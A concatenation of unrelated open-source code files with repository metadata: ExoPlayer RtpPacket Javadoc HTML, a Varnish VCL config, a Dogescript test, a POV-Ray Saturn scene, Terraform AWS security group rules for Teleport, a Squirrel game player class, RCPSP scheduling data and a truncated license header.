class="blockList"><a id="field.detail"> <!-- --> </a> <h3>Field Detail</h3> <a id="RTP_VERSION"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>RTP_VERSION</h4> <pre>public static final&nbsp;int RTP_VERSION</pre> <dl> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../../../constant-values.html#com.google.android.exoplayer2.source.rtsp.RtpPacket.RTP_VERSION">Constant Field Values</a></dd> </dl> </li> </ul> <a id="MAX_SIZE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>MAX_SIZE</h4> <pre>public static final&nbsp;int MAX_SIZE</pre> <dl> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../../../constant-values.html#com.google.android.exoplayer2.source.rtsp.RtpPacket.MAX_SIZE">Constant Field Values</a></dd> </dl> </li> </ul> <a id="MIN_HEADER_SIZE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>MIN_HEADER_SIZE</h4> <pre>public static final&nbsp;int MIN_HEADER_SIZE</pre> <dl> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../../../constant-values.html#com.google.android.exoplayer2.source.rtsp.RtpPacket.MIN_HEADER_SIZE">Constant Field Values</a></dd> </dl> </li> </ul> <a id="MIN_SEQUENCE_NUMBER"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>MIN_SEQUENCE_NUMBER</h4> <pre>public static final&nbsp;int MIN_SEQUENCE_NUMBER</pre> <dl> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../../../constant-values.html#com.google.android.exoplayer2.source.rtsp.RtpPacket.MIN_SEQUENCE_NUMBER">Constant Field Values</a></dd> </dl> </li> </ul> <a id="MAX_SEQUENCE_NUMBER"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>MAX_SEQUENCE_NUMBER</h4> <pre>public static final&nbsp;int MAX_SEQUENCE_NUMBER</pre> <dl> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../../../constant-values.html#com.google.android.exoplayer2.source.rtsp.RtpPacket.MAX_SEQUENCE_NUMBER">Constant Field Values</a></dd> </dl> </li> </ul> <a id="CSRC_SIZE"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>CSRC_SIZE</h4> <pre>public static final&nbsp;int CSRC_SIZE</pre> <dl> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../../../constant-values.html#com.google.android.exoplayer2.source.rtsp.RtpPacket.CSRC_SIZE">Constant Field Values</a></dd> </dl> </li> </ul> <a id="version"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>version</h4> <pre>public final&nbsp;byte version</pre> <div class="block">The RTP version field (Word 0, bits 0-1), should always be 2.</div> <dl> <dt><span class="seeLabel">See Also:</span></dt> <dd><a href="../../../../../../constant-values.html#com.google.android.exoplayer2.source.rtsp.RtpPacket.version">Constant Field Values</a></dd> </dl> </li> </ul> <a id="padding"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>padding</h4> <pre>public final&nbsp;boolean padding</pre> <div class="block">The RTP padding bit (Word 0, bit 2).</div> </li> </ul> <a id="extension"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>extension</h4> <pre>public final&nbsp;boolean extension</pre> <div class="block">The RTP extension bit (Word 0, bit 3).</div> </li> </ul> <a id="csrcCount"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>csrcCount</h4> <pre>public final&nbsp;byte csrcCount</pre> <div class="block">The RTP CSRC count field (Word 0, bits 4-7).</div> </li> </ul> <a id="marker"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>marker</h4> <pre>public final&nbsp;boolean marker</pre> <div class="block">The RTP marker bit (Word 0, bit 8).</div> </li> </ul> <a id="payloadType"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>payloadType</h4> <pre>public final&nbsp;byte payloadType</pre> <div class="block">The RTP CSRC count field (Word 0, bits 9-15).</div> </li> </ul> <a id="sequenceNumber"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>sequenceNumber</h4> <pre>public final&nbsp;int sequenceNumber</pre> <div class="block">The RTP sequence number field (Word 0, bits 16-31).</div> </li> </ul> <a id="timestamp"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>timestamp</h4> <pre>public final&nbsp;long timestamp</pre> <div class="block">The RTP timestamp field (Word 1).</div> </li> </ul> <a id="ssrc"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>ssrc</h4> <pre>public final&nbsp;int ssrc</pre> <div class="block">The RTP SSRC field (Word 2).</div> </li> </ul> <a id="csrc"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>csrc</h4> <pre>public final&nbsp;byte[] csrc</pre> <div class="block">The RTP CSRC fields (Optional, up to 15 items).</div> </li> </ul> <a id="payloadData"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>payloadData</h4> <pre>public final&nbsp;byte[] payloadData</pre> </li> </ul> </li> </ul> </section> <!-- ============ METHOD DETAIL ========== --> <section role="region"> <ul class="blockList"> <li class="blockList"><a id="method.detail"> <!-- --> </a> <h3>Method Detail</h3> <a id="parse(com.google.android.exoplayer2.util.ParsableByteArray)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>parse</h4> <pre class="methodSignature">@Nullable public static&nbsp;<a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp">RtpPacket</a>&nbsp;parse&#8203;(<a href="../../util/ParsableByteArray.html" title="class in com.google.android.exoplayer2.util">ParsableByteArray</a>&nbsp;packetBuffer)</pre> <div class="block">Creates an <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp"><code>RtpPacket</code></a> from a <a href="../../util/ParsableByteArray.html" title="class in com.google.android.exoplayer2.util"><code>ParsableByteArray</code></a>.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>packetBuffer</code> - The buffer that contains the RTP packet data.</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>The built <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp"><code>RtpPacket</code></a>.</dd> </dl> </li> </ul> <a id="parse(byte[],int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>parse</h4> <pre class="methodSignature">@Nullable public static&nbsp;<a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp">RtpPacket</a>&nbsp;parse&#8203;(byte[]&nbsp;buffer, int&nbsp;length)</pre> <div class="block">Creates an <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp"><code>RtpPacket</code></a> from a byte array.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>buffer</code> - The buffer that contains the RTP packet data.</dd> <dd><code>length</code> - The length of the RTP packet.</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>The built <a href="RtpPacket.html" title="class in com.google.android.exoplayer2.source.rtsp"><code>RtpPacket</code></a>.</dd> </dl> </li> </ul> <a id="writeToBuffer(byte[],int,int)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>writeToBuffer</h4> <pre class="methodSignature">public&nbsp;int&nbsp;writeToBuffer&#8203;(byte[]&nbsp;target, int&nbsp;offset, int&nbsp;length)</pre> <div class="block">Writes the data in an RTP packet to a target buffer. <p>The size of the target buffer and the length argument should be big enough so that the entire RTP packet could fit. That is, if there is not enough space to store the entire RTP packet, no bytes will be written. The maximum size of an RTP packet is defined as <a href="#MAX_SIZE"><code>MAX_SIZE</code></a>.</div> <dl> <dt><span class="paramLabel">Parameters:</span></dt> <dd><code>target</code> - A target byte buffer to which the packet data is copied.</dd> <dd><code>offset</code> - The offset into the target array at which to write.</dd> <dd><code>length</code> - The maximum number of bytes that can be written.</dd> <dt><span class="returnLabel">Returns:</span></dt> <dd>The number of bytes written, or <a href="../../C.html#LENGTH_UNSET"><code>C.LENGTH_UNSET</code></a> if there is not enough space to write the packet.</dd> </dl> </li> </ul> <a id="equals(java.lang.Object)"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>equals</h4> <pre class="methodSignature">public&nbsp;boolean&nbsp;equals&#8203;(@Nullable <a href="https://developer.android.com/reference/java/lang/Object.html" title="class or interface in java.lang" class="externalLink" target="_top">Object</a>&nbsp;o)</pre> <dl> <dt><span class="overrideSpecifyLabel">Overrides:</span></dt> <dd><code><a href="https://developer.android.com/reference/java/lang/Object.html#equals(java.lang.Object)" title="class or interface in java.lang" class="externalLink">equals</a></code>&nbsp;in class&nbsp;<code><a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true" title="class or interface in java.lang" class="externalLink" target="_top">Object</a></code></dd> </dl> </li> </ul> <a id="hashCode()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>hashCode</h4> <pre class="methodSignature">public&nbsp;int&nbsp;hashCode()</pre> <dl> <dt><span class="overrideSpecifyLabel">Overrides:</span></dt> <dd><code><a href="https://developer.android.com/reference/java/lang/Object.html#hashCode()" title="class or interface in java.lang" class="externalLink">hashCode</a></code>&nbsp;in class&nbsp;<code><a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true" title="class or interface in java.lang" class="externalLink" target="_top">Object</a></code></dd> </dl> </li> </ul> <a id="toString()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>toString</h4> <pre class="methodSignature">public&nbsp;<a href="https://developer.android.com/reference/java/lang/String.html" title="class or interface in java.lang" class="externalLink" target="_top">String</a>&nbsp;toString()</pre> <dl> <dt><span class="overrideSpecifyLabel">Overrides:</span></dt> <dd><code><a href="https://developer.android.com/reference/java/lang/Object.html#toString()" title="class or interface in java.lang" class="externalLink">toString</a></code>&nbsp;in class&nbsp;<code><a href="https://developer.android.com/reference/java/lang/Object.html?is-external=true" title="class or interface in java.lang" class="externalLink" target="_top">Object</a></code></dd> </dl> </li> </ul> </li> </ul> </section> </li> </ul> </div> </div> </main> <!-- ========= END OF CLASS DATA ========= --> <footer role="contentinfo"> <nav role="navigation"> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a id="navbar.bottom"> <!-- --> </a> <div class="skipNav"><a href="#skip.navbar.bottom" title="Skip navigation links">Skip navigation links</a></div> <a id="navbar.bottom.firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../../../../index.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="package-tree.html">Tree</a></li> <li><a href="../../../../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../../../../index-all.html">Index</a></li> <li><a href="../../../../../../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../../../../allclasses.html">All&nbsp;Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li><a href="#nested.class.summary">Nested</a>&nbsp;|&nbsp;</li> <li><a href="#field.summary">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field.detail">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method.detail">Method</a></li> </ul> </div> <a id="skip.navbar.bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </nav> </footer> </body> </html>
HTML
4
UniiqTV/ExoPlayer
docs/doc/reference/com/google/android/exoplayer2/source/rtsp/RtpPacket.html
[ "Apache-2.0" ]
vcl 4.0; import std; import directors; import rtstatus; backend default { .host = "127.0.0.1"; .port = "8080"; } backend server1 { .host = "127.0.0.1"; .port ="8081"; } backend server2 { .host = "127.0.0.1"; .port = "8082"; } sub vcl_init { new bar = directors.round_robin(); bar.add_backend(server1); bar.add_backend(server2); bar.add_backend(default); } sub vcl_recv { if (req.url ~ "/rtstatus.json") { return(synth(700, "OK")); } if (req.url ~ "/rtstatus") { return(synth(800, "OK")); } } sub vcl_synth { if (resp.status == 700) { set resp.status = 200; set resp.http.Content-Type = "application/json; charset=utf-8"; synthetic(rtstatus.rtstatus()); return (deliver); } if (resp.status == 800) { set resp.status = 200; set resp.http.Content-Type = "text/html; charset=utf-8"; synthetic(rtstatus.html()); return (deliver); } }
VCL
4
lkarsten/libvmod-rtstatus
example.vcl
[ "BSD-2-Clause" ]
rly foo bigger bar shh 1 wow
Dogescript
0
erinkeith/dogescript
test/spec/operators/bigger/control/rly/source.djs
[ "MIT" ]
camera { location <-100, 50, -250> look_at <0, 0, 0> } light_source { <-200, 0, 0> color rgb <1, 1, 1> * 2 } // Saturn union { // Gas giant sphere { <0, 0, 0>, 58.232 pigment{ image_map { gif "map/saturnmap.gif" map_type 1 } } } // D ring disc { <0, 0, 0>, y, 74.510, 66.9 pigment { color rgbf <0.1, 0.1, 0.1, 0.6> } finish { ambient 0 diffuse 0.4 } } // C ring disc { <0, 0, 0>, y, 92.0, 74.658 pigment { color rgbf <1.0, 0.9, 0.8, 0.7> } finish { ambient 0 diffuse 0.4 } } // Inner B ring disc { <0, 0, 0>, y, 98.39, 92.0 pigment { color rgbf <1.0, 0.9, 0.8, 0.1> } finish { ambient 0 diffuse 0.4 } } // Outer B ring disc { <0, 0, 0>, y, 117.58, 98.39 pigment { color rgbf <1.0, 0.9, 0.8, 0.1> } finish { ambient 0 diffuse 0.4 } } // Inner A ring (between Cassini division and Encke gap) disc { <0, 0, 0>, y, 133.5, 122.17 pigment { color rgbf <0.7, 0.6, 0.5, 0.05> } finish { ambient 0 diffuse 0.4 } } // Outer A ring (between Encke gap and Roche division) disc { <0, 0, 0>, y, 136.75, 133.8 pigment { color rgbf <0.7, 0.6, 0.5, 0.05> } finish { ambient 0 diffuse 0.4 } } // F ring disc { <0, 0, 0>, y, 140.48, 140.18 pigment { color rgbf <0.7, 0.6, 0.5, 0.05> } finish { ambient 0 diffuse 0.4 } } rotate <0, 0, 26.73> }
POV-Ray SDL
4
spcask/pov-ray-tracing
src/scene15.pov
[ "MIT" ]
/* Security Groups and Rules for Cluster. Note: Please see our Production Guide for network security recommendations. https://gravitational.com/teleport/docs/production/#firewall-configuration */ // Create a Security Group resource "aws_security_group" "cluster" { name = "${var.cluster_name}-cluster" vpc_id = data.aws_vpc.default.id tags = { TeleportCluster = var.cluster_name } } // Permit inbound to SSH resource "aws_security_group_rule" "cluster_ingress_ssh" { type = "ingress" from_port = 22 to_port = 22 protocol = "tcp" cidr_blocks = ["0.0.0.0/0"] security_group_id = aws_security_group.cluster.id } // Permit inbound to Teleport Web interface resource "aws_security_group_rule" "cluster_ingress_web" { type = "ingress" from_port = 3080 to_port = 3080 protocol = "tcp" cidr_blocks = ["0.0.0.0/0"] security_group_id = aws_security_group.cluster.id } // Permit inbound to Teleport services resource "aws_security_group_rule" "cluster_ingress_services" { type = "ingress" from_port = 3022 to_port = 3025 protocol = "tcp" cidr_blocks = ["0.0.0.0/0"] security_group_id = aws_security_group.cluster.id } // Permit all outbound traffic resource "aws_security_group_rule" "cluster_egress" { type = "egress" from_port = 0 to_port = 0 protocol = "-1" cidr_blocks = ["0.0.0.0/0"] security_group_id = aws_security_group.cluster.id }
HCL
4
antonio-te/teleport
examples/aws/terraform/starter-cluster/cluster_sg.tf
[ "Apache-2.0" ]
untyped global function CodeCallback_RegisterClass_CPlayer global function PlayerDropsScriptedItems global function IsDemigod global function EnableDemigod global function DisableDemigod int __nextInputHandle = 0 global struct PlayerSlowDownEffect { float slowEndTime float speedCap // max speed multiplier if this slow effect is active } function CodeCallback_RegisterClass_CPlayer() { //printl( "Class Script: CPlayer" ) CPlayer.ClassName <- "CPlayer" CPlayer.hasSpawned <- null CPlayer.hasConnected <- null CPlayer.isSpawning <- null CPlayer.isSpawningHotDroppingAsTitan <- false CPlayer.disableWeaponSlots <- false CPlayer.supportsXRay <- null CPlayer.lastTitanTime <- 0 CPlayer.globalHint <- null CPlayer.playerClassData <- null CPlayer.escalation <- null CPlayer.pilotAbility <- null CPlayer.titansBuilt <- 0 CPlayer.spawnTime <- 0 CPlayer.serverFlags <- 0 CPlayer.watchingKillreplayEndTime <- 0.0 CPlayer.cloakedForever <- false CPlayer.stimmedForever <- false RegisterSignal( "OnRespawnPlayer" ) RegisterSignal( "NewViewAnimEntity" ) RegisterSignal( "PlayerDisconnected" ) function CPlayer::constructor() { CBaseEntity.constructor() } function CPlayer::RespawnPlayer( ent ) { this.Signal( "OnRespawnPlayer", { ent = ent } ) // hack. Players should clear all these on spawn. this.ViewOffsetEntity_Clear() ClearPlayerAnimViewEntity( expect entity( this ) ) this.spawnTime = Time() this.ClearReplayDelay() this.ClearViewEntity() // titan melee can set these vars, and they need to clear on respawn: this.SetOwner( null ) this.kv.VisibilityFlags = ENTITY_VISIBLE_TO_EVERYONE Assert( !this.GetParent(), this + " should not have a parent yet! - Parent: " + this.GetParent() ) Assert( this.s.respawnCount <= 1 || IsMultiplayer(), "Tried to respawn in single player, see callstack" ) this.Code_RespawnPlayer( ent ) } /* CPlayer.__SetTrackEntity <- CPlayer.SetTrackEntity function CPlayer::SetTrackEntity( ent ) { printl( "\nTime " + Time() + " Ent " + ent ) DumpStack() this.__SetTrackEntity( ent ) } */ function CPlayer::GetDropEntForPoint( origin ) { return null } function CPlayer::GetPlayerClassData( myClass ) { Assert( myClass in this.playerClassData, myClass + " not in playerClassData" ) return this.playerClassData[ myClass ] } function CPlayer::InitMPClasses() { this.playerClassData = {} Titan_AddPlayer( this ) Wallrun_AddPlayer( this ) } function CPlayer::InitSPClasses() { this.playerClassData = {} SetTargetName( expect entity( this ), expect string( this.GetTargetName() + this.entindex() ) ) Titan_AddPlayer( this ) } // function SpawnAsClass() function CPlayer::SpawnAsClass( className = null ) { if ( !className ) { className = this.GetPlayerClass() } switch ( className ) { case level.pilotClass: Wallrun_OnPlayerSpawn( this ) break default: Assert( 0, "Tried to spawn as unsupported " + className ) } } function CPlayer::GiveScriptWeapon( weaponName, equipSlot = null ) { this.scope().GiveScriptWeapon( weaponName, equipSlot ) } function CPlayer::OnDeathAsClass( damageInfo ) { switch ( this.GetPlayerClass() ) { case "titan": Titan_OnPlayerDeath( expect entity( this ), damageInfo ) break case level.pilotClass: Wallrun_OnPlayerDeath( expect entity( this ), damageInfo ) break } } function CPlayer::Disconnected() { this.Signal( "_disconnectedInternal" ) svGlobal.levelEnt.Signal( "PlayerDisconnected" ) if ( HasSoul( expect entity( this ) ) ) { thread SoulDies( expect entity( this ).GetTitanSoul(), null ) } entity titan = GetPlayerTitanInMap( expect entity( this ) ) if ( IsAlive( titan ) && titan.IsNPC() ) { local soul = titan.GetTitanSoul() if ( IsValid( soul ) && soul.followOnly ) FreeAutoTitan( titan ) else titan.Die( null, null, { damageSourceId = eDamageSourceId.damagedef_suicide } ) // titan.Die() } PROTO_CleanupTrackedProjectiles( expect entity( this ) ) if ( this.globalHint != null ) { this.globalHint.Kill_Deprecated_UseDestroyInstead() this.globalHint = null } } function CPlayer::GetClassDataEnts() { local ents = [] local added if ( this.playerClassData == null ) return ents; foreach ( ent in this.playerClassData ) { added = false foreach ( newent in ents ) { if ( newent == ent ) { added = true break } } if ( !added ) ents.append( ent ) } return ents } function CPlayer::CleanupMPClasses() { } function CPlayer::HasXRaySupport() { return ( this.supportsXRay != null ) } function CPlayer::GiveExtraWeaponMod( mod ) { if ( this.HasExtraWeaponMod( mod ) ) return local mods = this.GetExtraWeaponMods() mods.append( mod ) this.SetExtraWeaponMods( mods ) } function CPlayer::HasExtraWeaponMod( mod ) { local mods = this.GetExtraWeaponMods() foreach( _mod in mods ) { if ( _mod == mod ) return true } return false } function CPlayer::TakeExtraWeaponMod( mod ) { if ( !this.HasExtraWeaponMod( mod ) ) return local mods = this.GetExtraWeaponMods() mods.fastremovebyvalue( mod ) this.SetExtraWeaponMods( mods ) } function CPlayer::ClearExtraWeaponMods() { this.SetExtraWeaponMods( [] ) } function CPlayer::SetPlayerPilotSettings( settingsName ) { this.SetPlayerRequestedSettings( settingsName ) } function CPlayer::RecordLastMatchContribution( contribution ) { // replace with code function } function CPlayer::RecordLastMatchPerformance( matchPerformance ) { // replace with code function } function CPlayer::RecordSkill( skill ) { // replace with code function this.SetPersistentVar( "ranked.recordedSkill", skill ) } function CPlayer::SetPlayerSettings( settings ) { local oldPlayerClass = CPlayer.GetPlayerClass() CPlayer.SetPlayerSettingsWithMods( settings, [] ) this.RunSettingsChangedFuncs( settings, oldPlayerClass ) } function CPlayer::SetPlayerSettingsFromDataTable( pilotDataTable ) { local oldPlayerClass = CPlayer.GetPlayerClass() local settings = pilotDataTable.playerSetFile local mods = pilotDataTable.playerSetFileMods this.SetPlayerSettingsWithMods( settings, mods ) this.RunSettingsChangedFuncs( settings, oldPlayerClass ) } function CPlayer::RunSettingsChangedFuncs( settings, oldPlayerClass ) { if ( IsAlive( expect entity( this ) ) && !this.IsTitan() && GetCurrentPlaylistVarFloat( "pilot_health_multiplier", 0.0 ) != 0.0 ) { float pilotHealthMultiplier = GetCurrentPlaylistVarFloat( "pilot_health_multiplier", 1.0 ) int pilotMaxHealth = int( this.GetMaxHealth() * pilotHealthMultiplier ) this.SetMaxHealth( pilotMaxHealth ) this.SetHealth( pilotMaxHealth ) } if ( this.IsTitan() ) { entity soul = expect entity ( this.GetTitanSoul() ) local index = PlayerSettingsNameToIndex( settings ) soul.SetPlayerSettingsNum( index ) foreach ( func in svGlobal.soulSettingsChangeFuncs ) { func( soul ) } } } } void function PlayerDropsScriptedItems( entity player ) { foreach ( callbackFunc in svGlobal.onPlayerDropsScriptedItemsCallbacks ) callbackFunc( player ) } bool function IsDemigod( entity player ) { return player.p.demigod } void function EnableDemigod( entity player ) { Assert( player.IsPlayer() ) player.p.demigod = true } void function DisableDemigod( entity player ) { Assert( player.IsPlayer() ) player.p.demigod = false }
Squirrel
4
GeckoEidechse/NorthstarMods
Northstar.CustomServers/mod/scripts/vscripts/class/cplayer.nut
[ "MIT" ]
100 5 0 0 0 1 6 3 1 5 2 6 4 [0] [0] [0] [0] [0] [0] 1 1 1 74 [10] 2 1 1 73 [14] 3 1 1 62 [14] 4 1 1 42 [5] 5 1 1 57 [8] 6 1 1 30 [10] 7 1 1 63 [13] 8 1 1 89 [9] 9 1 1 26 [11] 10 1 1 14 [13] 11 1 1 93 [10] 12 1 1 95 [6] 13 1 1 85 [5] 14 1 1 28 [6] 15 1 1 99 [12] 16 1 1 49 [13] 17 1 1 81 [12] 18 1 1 59 [6] 19 1 1 40 [6] 20 1 1 96 [11] 21 1 2 70 27 [-56] [7] 22 1 1 67 [6] 23 1 2 72 64 [9] [-82] 24 1 1 80 [13] 25 1 2 29 9 [5] [-68] 26 1 1 25 [10] 27 1 1 71 [10] 28 1 1 55 [13] 29 1 1 88 [7] 30 1 2 39 84 [7] [7] 31 1 2 65 48 [10] [10] 32 1 1 24 [7] 33 1 1 56 [12] 34 1 2 99 61 [8] [8] 35 1 2 92 82 [13] [13] 36 1 1 22 [12] 37 1 1 17 [10] 38 1 1 86 [9] 39 1 1 76 [15] 40 1 1 8 [15] 41 1 1 32 [10] 42 1 1 84 [9] 43 1 1 53 [14] 44 1 2 11 21 [11] [11] 45 1 1 98 [12] 46 1 1 54 [9] 47 1 2 19 90 [5] [5] 48 1 1 37 [11] 49 1 2 38 66 [11] [11] 50 1 2 82 35 [8] [8] 51 1 2 29 13 [15] [15] 52 1 1 16 [10] 53 1 1 7 [14] 54 1 1 18 [10] 55 1 2 46 39 [9] [9] 56 1 1 13 [6] 57 1 1 10 [15] 58 1 3 50 35 83 [8] [8] [-116] 59 1 1 91 [11] 60 1 2 9 4 [8] [-87] 61 1 1 15 [9] 62 1 1 12 [11] 63 1 1 38 [6] 64 1 1 60 [12] 65 1 1 36 [13] 66 1 1 47 [7] 67 1 1 79 [7] 68 1 2 20 96 [8] [8] 69 1 2 92 41 [10] [10] 70 1 2 44 17 [8] [8] 71 1 1 68 [14] 72 1 1 100 [11] 73 1 1 70 [5] 74 1 1 45 [14] 75 1 2 34 15 [8] [8] 76 1 1 11 [9] 77 1 1 75 [11] 78 1 2 75 77 [10] [10] 79 1 1 87 [10] 80 1 1 52 [12] 81 1 1 94 [14] 82 1 4 97 31 86 35 [11] [-122] [-122] [-93] 83 1 3 92 82 65 [9] [9] [9] 84 1 1 33 [7] 85 1 2 64 100 [11] [11] 86 1 1 83 [8] 87 1 1 58 [8] 88 1 1 23 [13] 89 1 1 90 [14] 90 1 1 43 [15] 91 1 2 69 24 [7] [7] 92 1 1 82 [10] 93 1 1 31 [15] 94 1 1 51 [5] 95 1 2 78 99 [11] [11] 96 1 2 101 2 [5] [-88] 97 1 5 101 35 86 36 82 [8] [-76] [-129] [-112] [-55] 98 1 1 101 [12] 99 1 1 101 [15] 100 1 1 101 [6] 101 1 0 0 1 0 0 0 0 0 0 1 1 10 3 2 2 0 2 2 1 14 2 2 2 3 0 3 1 14 0 1 1 0 2 4 1 5 2 3 0 0 0 5 1 8 2 2 0 3 3 6 1 10 3 3 0 0 2 7 1 13 2 0 2 0 0 8 1 9 2 0 0 1 0 9 1 11 3 0 1 0 3 10 1 13 2 3 2 0 3 11 1 10 1 2 3 1 2 12 1 6 1 1 3 2 0 13 1 5 3 3 1 0 3 14 1 6 2 1 3 3 0 15 1 12 3 2 1 0 0 16 1 13 2 1 1 2 1 17 1 12 0 0 0 0 3 18 1 6 0 1 3 2 0 19 1 6 2 0 3 0 0 20 1 11 0 2 1 1 3 21 1 7 1 2 2 0 0 22 1 6 0 0 0 0 2 23 1 9 0 2 3 3 2 24 1 13 1 1 0 1 3 25 1 5 0 3 2 3 0 26 1 10 0 3 1 3 2 27 1 10 0 3 1 0 2 28 1 13 0 0 3 0 0 29 1 7 2 3 2 2 0 30 1 7 1 2 3 0 0 31 1 10 0 3 1 0 0 32 1 7 0 2 3 0 1 33 1 12 3 0 1 3 3 34 1 8 2 3 1 2 0 35 1 13 0 0 0 2 1 36 1 12 0 0 3 3 2 37 1 10 1 2 2 2 0 38 1 9 0 0 0 0 2 39 1 15 1 0 1 1 2 40 1 15 2 3 2 2 2 41 1 10 2 0 2 2 1 42 1 9 3 3 0 0 1 43 1 14 2 1 3 0 2 44 1 11 1 1 0 3 0 45 1 12 0 0 0 0 1 46 1 9 1 2 0 2 0 47 1 5 1 0 0 0 1 48 1 11 3 3 1 3 1 49 1 11 1 1 2 0 1 50 1 8 3 3 3 0 0 51 1 15 3 0 0 1 1 52 1 10 3 2 0 2 3 53 1 14 0 1 3 0 1 54 1 10 0 0 3 0 0 55 1 9 2 0 1 1 0 56 1 6 1 0 3 0 2 57 1 15 3 3 2 3 3 58 1 8 0 1 3 3 1 59 1 11 2 2 3 0 2 60 1 8 0 0 3 3 3 61 1 9 1 3 3 3 0 62 1 11 3 3 1 0 1 63 1 6 3 1 1 3 0 64 1 12 1 1 1 2 3 65 1 13 1 1 1 0 2 66 1 7 0 0 0 0 2 67 1 7 3 3 2 2 2 68 1 8 2 0 0 1 2 69 1 10 2 0 0 0 2 70 1 8 0 0 1 1 1 71 1 14 2 2 2 3 0 72 1 11 2 1 3 0 3 73 1 5 2 0 0 3 0 74 1 14 1 2 2 0 1 75 1 8 3 0 0 0 0 76 1 9 3 3 2 0 1 77 1 11 1 0 2 0 1 78 1 10 2 0 1 0 2 79 1 10 3 3 1 0 3 80 1 12 2 3 2 3 2 81 1 14 3 1 0 0 3 82 1 11 3 0 0 3 1 83 1 9 1 0 0 3 1 84 1 7 2 2 3 3 2 85 1 11 0 0 2 2 2 86 1 8 0 1 3 2 0 87 1 8 2 0 0 3 3 88 1 13 1 1 2 3 3 89 1 14 2 0 0 1 3 90 1 15 0 0 2 1 2 91 1 7 2 0 2 0 1 92 1 10 0 1 0 0 2 93 1 15 2 3 0 3 1 94 1 5 0 0 1 2 1 95 1 11 2 3 3 3 2 96 1 5 3 2 1 2 2 97 1 8 0 2 0 0 0 98 1 12 0 0 0 2 1 99 1 15 1 2 0 2 1 100 1 6 3 1 2 0 0 101 1 0 0 0 0 0 0 10 9 7 9 8
Eagle
1
klorel/or-tools
examples/data/rcpsp/single_mode_max_delay/testsetd/psp48.sch
[ "Apache-2.0" ]
/* * Copyright 2017-2019 Jiří Janoušek <[email protected]> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * 1. Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR 